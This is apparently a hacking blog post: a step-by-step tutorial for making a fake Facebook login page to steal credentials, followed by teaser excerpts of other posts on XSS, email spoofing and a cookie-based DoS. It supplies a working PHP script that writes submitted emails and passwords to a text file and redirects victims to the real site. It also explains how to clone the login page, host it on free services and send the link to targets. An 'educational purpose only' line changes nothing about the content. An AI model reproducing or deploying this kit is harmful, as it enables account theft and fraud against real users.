What is Phishing? How Hackers Hack Through Phishing Attack






Phishing is a term used to describe a malicious individual or group of individuals who scam users.Phishing is a type of social engineering attack often used to steal user data, including login credentials and credit card numbers.Phishing is the process of directing users to enter details into a fake website that look and feel like the legitimate one. Basically all you are doing is getting your target to login to your fake login page and you will be sent their  email and password.



PHISIHING TUTORIAL STEP BY STEP:





1. Creating Phishing.php file
Even if you don't have any knowledge of php file simply copy the following script and save it as phishing.php .


<?php

header("Location: https://www.facebook.com/login.php");
$handle = fopen("passwords.txt", "a");

foreach($_GET as $variable => $value) {fwrite($handle, $variable);fwrite($handle, "=");

fwrite($handle, $value);

fwrite($handle, "\r\n");}

fwrite($handle, "\r\n");
fclose($handle);
exit;

?> 


2. Creating index.html page 

1. Open Facebook login page then, Right click>View page source and paste it in notepad and save it a
index.html





2. Open that index.html file with a Notepad and search (By pressing Ctrl+F) for : action in it and replace the highlighted part (as in the following screenshot) with phishing.php .



3. search (By pressing Ctrl+F) for : method in it and replace the highlighted part (post) with get .



4. save index.html


3. Now create a completely blank text file with name passwords.txt.


Now you have all the following three files with you :

1. phishing.php
2. index.html
3. passwords.txt


4. Now you need to make a website means need free hosting.

Register on byethost.com or 2freehosting.comor use any free hosting service you like.


Log into your account Cpanel.


Go to File Manager under Files and log into it.




5. Now Click on the Public_html.



6 .Click on the Upload button and upload 3 files named phishing.php, index.html and passwords.txt 
(before uploading files you need to delete all the files inside  the Public_html folder)

7. After successfully uploaded 3 files click on index.html file, then your fake phishing page will open up.

Ready.

Now sent your fake login page's URL to someone via email or chatting  , when someone type their facebook email and password in your fake login page it will store to your passwords.txt file


 Through this attacker can hack any website account.




NOTE: This is just for educational purpose only.

Comments

Post a Comment

Popular posts from this blog

XSS like a Pro

Image
Hello Friends, I'm gonna share my interesting finding here. Recently,  About two months ago,  I received a private invitation on Bugcrowd and the next day I started to look for bugs on that website because there was only one target (testing site) in scope and they provided me some credentials. I can't disclose the site name, so let's assume https://redacted.com First of all, I logged-in to that site (redacted.com) with the provided credentials and inspected the site around 15 minutes and tried to understand it. After that, I started to look for bugs and found multiple bugs mostly stored XSS. At that day, I had found a total 11 vulnerabilities. I reported them and received a bounty on each report. So, I'm not disclosing the bounties. Also, I'm not sharing my all findings but some. So,  At the beginning, I tried to change my default password and successfully changed my password to '1' which was the first bug that there is no password policy.
Read more

Email Spoofing for Beginners

Image
Hello Everyone, Greetings to all, In this article, I'll talk about email spoofing in a little depth. So, First of all What is Email Spoofing?  If you already know about email spoofing then congratulations But don't worry if u don't know about email spoofing. Email spoofing is a tactic used in phishing and spam campaigns because people are more likely to open an email when they think it has been sent by a legitimate source. It's not a new technique. It's a very old technique and still widely used in phishing and scamming. This article is going to be interesting and I'll try to short this long article as much simple as possible. Recently, my friend ask me How it's possible to spoof an email? So, there are a lot of questions related to this issue.  When a Domain is Spoofable? It is just as simple in an email as well because email protocols (SMTP) lack authentication. Anyone with a little basic knowledge can able to send an email wit
Read more

DoS on WAF Protected Sites by Abusing Cookie

Image
Hi Folks, Today, I'm gonna share one of my interesting finding in bug bounty. I occasionally hunt bugs in bug bounty in my free time. So, I don't have enough time to blog. But on someone request, I share some of my bug bounty findings here. I like to find some interesting and logical bugs. Recently, I found an interesting bug in many sites but I can't disclose the name of every website, one website 'Upwork' already patched this bug and resolved the report that's why I disclose the name. So, what's the bug?   Denial of Service (DoS) > Single user cookie based DoS There are a lot of websites using WAF like Cloudflare etc. When the Cookie sets with malicious characters(like"><script> alert(1)</script> mean  with XSS or SQLI payloads etc.) value, the site WAF like Cloudflare block us from accessing that website, we need to remove that cookie to access the site Many websites sets 'Referrer'
Read more